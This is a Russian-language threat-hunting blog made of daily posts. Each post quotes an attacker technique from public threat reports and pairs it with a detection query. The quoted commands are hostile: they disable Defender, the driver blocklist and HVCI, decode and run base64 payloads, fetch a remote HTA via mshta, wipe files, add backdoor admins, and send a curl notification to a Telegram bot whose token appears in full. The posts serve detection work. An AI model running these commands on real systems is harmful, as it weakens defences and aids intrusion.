Одно из моих выступлений на SOC Forum в этом году было посвящено работе над этим блогом. В нем я рассказал о 20 самых запоминающихся техниках, которые я виде в публичных исследованиях киберугроз. Делюсь с вами его записью!

Всем привет!

Я уже упоминал, что злоумышленники начали использовать фишинговые письма для атак на Linux-системы. Нет, не повсеместно. По крайней мере, пока.

Итак, как вы знаете, APT36 обычно используют вредоносные файлы .desktop и скрывают вредоносную логику внутри закодированных данных, например:

sh -c "echo [base64_encoded_data] | base64 -d | sh"

Да, мы можем видеть похожие команды, выполняемые легитимно, и да, это ещё одна возможность для охоты:

event_type: "processcreatenix"

AND

cmdline: ("echo" AND "base64" AND "d" AND "sh")

Увидимся завтра!

English version

Всем привет!

Злоумышленники любят PowerShell, так как с его помощью можно решать сотни задач. Давайте посмотрим на ещё один любопытный пример.

Согласно отчёту, злоумышленник использовал PowerShell для отключения устройств Plug and Play, а именно клавиатуры и мыши:

Get-PnpDevice -FriendlyName 'HID Keyboard Device' | %{Disable-PnpDevice -InputObject $_ -ErrorAction SilentlyContinue -Confirm:$false}

Get-PnpDevice -Class Keyboard | %{Disable-PnpDevice -InputObject $_ -ErrorAction SilentlyContinue -Confirm:$false}

Get-PnpDevice -Class Mouse | %{Disable-PnpDevice -InputObject $_ -ErrorAction SilentlyContinue -Confirm:$false}

Write-Host "Devices disabled."

Не очень распространённое событие, поэтому если вы собираете ScriptBlock, у вас есть ещё одна возможность для детектирования или охоты:

event_type: "scriptexecutionwin"

AND

script_text: "Disable-PnpDevice"

Увидимся завтра!

English version

Всем привет!

Если вы устали от типичных методов закрепления (как и я), этот вариант для вас. Не новый, но встречаю его не очень часто.

Итак, согласно отчёту, противник использовал MuddyViper. Вредоносное ПО настраивает свой каталог установки как папку автозагрузки Windows, устанавливая следующие значения реестра на %APPDATALOCAL%\Microsoft\Windows\PPBCompatCache\ManagerCache:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Startup

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup

Стоит поохотиться, верно?

event_type: "registryvaluesetwin"

AND

reg_key_path: "shell folders\\startup"

AND NOT

reg_value_data: "programs\\startup"

Увидимся завтра!

English version

Всем привет!

В некоторых случаях злоумышленники всё ещё используют вредоносные документы для доставки вредоносного ПО. Давайте посмотрим на недавний пример.

Снова MuddyWater. Противник использовал фишинговые письма для доставки вредоносных документов Microsoft Word. Документ помещал UDPGangster в C:\Users\Public\ui.txt и запускал его.

Здесь мы видим, что winword.exe запускает подозрительный файл из папки %PUBLIC%. Давайте преобразуем это в запрос:

event_type: "processcreatewin"

AND

proc_p_file_path: "winword.exe"

AND

proc_file_path: "public"

Увидимся завтра!

English version

Всем привет!

Я уже делился некоторыми примечательными примерами техники Modify Registry (T1112). Пора привести ещё несколько интересных случаев.

Sophos опубликовала отличный отчёт о недавней активности Red Wolf. Согласно отчёту, злоумышленник изменил следующие ключи реестра:

HKLM\SYSTEM\CurrentControlSet\Control\CI\Config /v VulnerableDriverBlocklistEnable /t REG_DWORD /d 0x0 /f

HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity /v Enabled /t REG_DWORD /d 0x0 /f

Первый отключает блок-лист уязвимых драйверов, второй — Hypervisor-Enforced Code Integrity. Оба являются хорошими целями для поиска, поэтому:

event_type: "registryvaluesetwin"

AND

reg_key_path: ("VulnerableDriverBlocklistEnable" OR "HypervisorEnforcedCodeIntegrity")

AND

reg_value_data: "0x00000000"

Увидимся завтра!

English version

Всем привет!

Мы уже рассмотрели множество легитимных инструментов, которые злоумышленники используют для решения различных задач. Пора познакомиться ещё с одним! Его часто применяют для System Services: Service Execution (T1569.002).

Я говорю о Non-sucking Service Manager (NSSM). Его используют различные группировки. Например, если посмотреть отчёт о Red Wolf, можно увидеть, что он применялся для создания двух различных служб Windows, указывающих на один и тот же файл - Chisel (MSAProfileNotificationHandler.exe).

И да, это ещё одна отличная цель для охоты:

event_type: "processcreatewin"

AND

proc_file_productname: "nssm"

Увидимся завтра!

English version

Всем привет!

Сегодня понедельник, так что давайте посмотрим на классическую (по крайней мере, на мой взгляд) цель для проактивного поиска — System Binary Proxy Execution: Mshta (T1218.005).

Я снова наткнулся на это, просматривая отчёт о кластере активности, который мы отслеживаем как Lone Wolf. Противник использовал вредоносные LNK-файлы для развертывания Cobalt Strike Beacon.

Например, LNK выполняет следующую команду:

powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command "Start-Process mshta -ArgumentList 'hxxps://iplogger[.]cn/forensicsas.png'"

Как видите, здесь mshta.exe используется для доступа к ссылке, которая перенаправляет на вредоносный HTA-файл. Поэтому, например, мы можем искать случаи, где mshta.exe обращается к подозрительным ссылкам:

event_type: "processcreatewin"

AND

proc_file_path: "mshta.exe"

AND

cmdline: *http*

Увидимся завтра!

English version

Всем привет!

Сегодня мы рассмотрим ещё один пример того, как противник злоупотребляет легитимными исполняемыми файлами Windows, чтобы обходить защиту.

На этот раз речь пойдет о SystemSettingsAdminFlows.exe. Согласно этому отчёту, DeadLock использовали эту утилиту для отключения различных функций Windows Defender:

SystemSettingsAdminFlows.exe Defender RTP 1 
SystemSettingsAdminFlows.exe Defender SpynetReporting 0 
SystemSettingsAdminFlows.exe Defender SubmitSamplesConsent 0 
SystemSettingsAdminFlows.exe Defender DisableEnhancedNotifications 1

Эти команды отключают защиту в реальном времени (RTP) и облачные механизмы защиты, прекращают отправку отчётов об угрозах в Microsoft и не позволяют Windows Defender автоматически отправлять подозрительные файлы на анализ.

Стоит запроса, не так ли?

event_type: "processcreatewin"

AND

proc_file_path: "systemsettingsadminflows.exe"

AND

cmdline: "defender"

Увидимся завтра!

English version

Всем привет!

Мы уже несколько раз говорили об этом, но сегодня я заметил ещё один криминалистический инструмент в арсенале противника.

И да, это ещё один пример того, как злоумышленники могут получить дамп LSASS. На этот раз, согласно этому посту, они использовали MemProcFS, чтобы смонтировать дамп памяти скомпрометированной системы:

memprocfs.exe -device dump.dmp

Если вы не занимаетесь реагированием на инциденты, запуск MemProcFS — довольно подозрительное событие, и точно стоит запроса:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "memprocfs.exe"

Увидимся завтра!

English version

Всем привет!

Во многих случаях противник удаляет артефакты со компрометированных систем, поэтому сегодня мы рассмотрим несколько примеров техники Indicator Removal: File Deletion (T1070.004).

Наш сегодняшний пример — вымогатель 01flip. У него есть варианты как для Windows, так и для Linux.
Вариант для Windows удаляет сам себя с помощью следующей команды:

ping 127.0.0.7 -n 5 > Nul & fsutil file setZeroData offset=0 length=4194303 ${self_name} > Nul & Del /f /q ${self_name}

Как видите, он злоупотребляет fsutil, чтобы очистить содержимое файла. Мы можем искать подобную активность:

event_type: "processcreatewin"

AND

proc_file_path: "fsutil.exe"

AND

cmdline: ("file" AND "setzerodata")

Вариант для Linux выполняет следующую команду:

sleep 5 && dd if=/dev/urandom of=${self_name} bs=1M count=4 > /dev/null 2>&1 && rm ${self_name} > /dev/null 2>&1

Здесь злоумышленник использует dd, и это ещё одна возможность для охоты:

event_type: "processcreatenix"

AND

proc_file_path: "dd"

AND

cmdline: "urandom"

Увидимся завтра!

English version

Всем привет!

Злоумышленники часто используют скомпрометированные учетные данные, но в некоторых случаях они могут создавать новые аккаунты. И иногда эти аккаунты довольно уникальны, поэтому мы можем использовать их для обнаружения и охоты.

Как всегда, нам нужны примеры. Давайте взглянем на этот отчёт. Противник создал новые учётные записи администраторов со следующими именами: backupadmin, admin_gpo и lapsadmin1. Например:

cmd.exe /c net user backupadmin abcd1234

События создания подозрительных пользователей могут быть отличными целями для охоты, поэтому убедитесь, что вы документируете их не только для атрибуции и кластеризации, но также и для детектирования:

event_type: "usercreatewin"

AND

usr_tgt_name: ("backupadmin" OR "admin_gpo" OR "lapsadmin1")

Увидимся завтра!

English version

Всем привет!

Мы уже несколько раз говорили о Modify Registry (T1112), но я заметил ещё несколько интересных процедур, так что давайте на них посмотрим.

Наш сегодняшний пример — VolkLocker. У него есть несколько любопытных особенностей, связанных с изменением реестра.

Он отключает Диспетчер задач:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

Отключает Редактор реестра:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

Отключает командную строку Windows:

reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

Удаляет диалог «Выполнить»:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f

Удаляет пункты «Завершение работы», «Перезагрузка», «Спящий режим»:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f

Скрывает диск C:\:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 4

Как видите, у нас здесь множество возможностей для обнаружения. Например:

event_type: "registryvaluesetwin"

AND

reg_key_path: ("DisableTaskMgr" OR "DisableRegistryTools" OR "DisableCMD" OR "NoRun" OR "NoClose" OR "NoDrives")

Увидимся завтра!

English version

Всем привет!

Злоумышленники могут скрывать вредоносный контент где угодно, в том числе в абсолютно легитимных файлах, поэтому сегодня мы рассмотрим следующую технику — Obfuscated Files or Information: Steganography (T1027.003).

В некоторых случаях атакующие могут использовать вполне обычное вредоносное ПО, но при этом применять интересные техники. Как раз как в этом случае.

Злоумышленник использовал вредоносные LNK-файлы для запуска команды, которая извлекала и выполняла вредоносный скрипт из файла субтитров:

cmd.exe /c type Part2.subtitles.srt | more | findstr /n "^" | findstr "100: 101: 102: 103:" | for /f "tokens=1,* delims=:" %a in ('more') do cmd /c %b

Интересно, правда? Мы можем охотиться за похожей активностью:

event_type: "processcreatewin"

AND

proc_file_path: "cmd.exe"

AND

cmdline: ("type" AND "findstr" AND *.srt)

Увидимся завтра!

English version

Друзья, всем привет!

Регистрируйтесь на предновогодний эфир и задавайте вопросы - за лучшие вручим эксклюзивные подарки!

Всем привет!

DLL Side-Loading становится всё более популярным среди злоумышленников, распространяющих массовое вредоносное ПО, поэтому сегодня мы рассмотрим технику Hijack Execution Flow: DLL (T1574.001).

Злоумышленник использовал переименованную версию FoxitPDFReader.exe для загрузки вредоносной msimg32.dll, которая запускает цепочку, приводящую к загрузке PureRAT.

Атакующие использовали различные имена для легитимного исполняемого файла, например:

Authentic_Job_Application_Form.exe
Project_Salary_Commission_and Benefits.exe
Compensation, Incentives, and Benefits for project participation.exe
Compensation_Benefits_Commission.exe
Digital_Marketing_Proficiency_Test.exe
Salary, Incentives, and Benefits for the Project.exe
Marketing_Performance_Test_Assignment.exe
Commission_Structure.exe
Salary_Incentives_and_Benefits_for_the_Project.exe
Pay_Benefits_Commission_Plan.exe

Таким образом, одной из возможностей для охоты за подобной активностью — поиск FoxitPDFReader.exe с нетипичными именами:

event_type: "processcreatewin"

AND

proc_file_originalfilename: "FoxitPDFReader.exe"

AND NOT

proc_file_path: "FoxitPDFReader.exe"

Увидимся завтра!

English version

Привет всем!

В некоторых случаях злоумышленникам не требуется выделенная инфраструктура C2. Они могут использовать следующую технику: Web Service (T1102).

UNC5174, например, использовал API Discord в качестве своего C2-канала. Такой подход позволил противнику имитировать легитимный трафик и обходить существующие политики безопасности.

К сожалению, домены, связанные с Discord, могут использоваться различным легитимным программным обеспечением, но всё равно это отличная цель для проактивного поиска угроз, так как это уже не первый случай, когда злоумышленники злоупотребляют ими:

event_type: ("dnsreqwin" OR "dnsreqnix")

AND

dns_rname: ("discord.com" OR "discord.gg")

AND NOT

proc_file_path: *discord*

Увидимся завтра!

English version

Всем привет!

Давайте рассмотрим ещё один любопытный случай того, как злоумышленники злоупотребляют легитимными веб-сервисами для решения различных задач. На этот раз мы посмотрим, как они используют Telegram для получения уведомлений.

Наш сегодняшний пример — DeerStealer. Как вы можете видеть, злоумышленники использовали curl.exe, чтобы получить уведомление о том, что вредоносная нагрузка была выполнена:

C:\WINDOWS\system32\cmd.exe /d /s /c "curl -s -X POST https://api.telegram.org/bot7972762095:AAE_DZEcCA4tkMpVK-peSGL6x4j4GMgl-3g/sendMessage -d chat_id=8093548175 -d text="undefined - executable запущен""

Подобная активность может быть и легитимной — администраторы могут использовать Telegram для получения уведомлений, если что-то пошло не так. Тем не менее, это всё равно хорошая цель для проактивного поиска:

event_type: "processcreatewin"

AND

proc_file_path: "curl.exe"

AND

cmdline: *telegram*

Увидимся завтра!

English version

Привет всем!

Сегодня мы рассмотрим ещё несколько примеров того, как злоумышленники намеренно ослабляют уровень безопасности Windows, чтобы облегчить закрепление в системе и продвижение по ИТ-инфраструктуре.

Согласно отчёту, Ink Dragon изменял различные параметры реестра Windows для ослабления защитных механизмов: включал ограниченный администраторский режим (DisableRestrictedAdmin), отключал фильтрацию токенов для удалённых подключений (LocalAccountTokenFilterPolicy), включал учётную запись администратора DSRM (DsrmAdminLogonBehavior), а также отключал защиту уровня Process Protection Level (RunAsPPL).

Все эти поведенческие маркеры являются неплохими целями для проактивного поиска, например:

event_type: "registryvaluesetwin"

AND

reg_key_path: "localaccounttokenfilterpolicy"

AND

reg_value_data: "0x00000001"

Увидимся завтра!

English version

Всем привет!

Давайте рассмотрим ещё один интересный пример того, как злоумышленники злоупотребляют легитимной инфраструктурой для C2. На этот раз — Fastly.

Kaspersky раскрыла очередную кампанию ForumTroll. В этот раз противник использовал Tuoni — коммерческий фреймворк для Red Teaming. При этом злоумышленники применяли тот же сервис для C2, что и в предыдущих кампаниях, — Fastly.

Что это значит? Мы можем использовать это в наших Threat Hunting миссиях!

event_type: "dnsreqwin"

AND

dns_rname: "fastly.net"

Увидимся завтра!

English version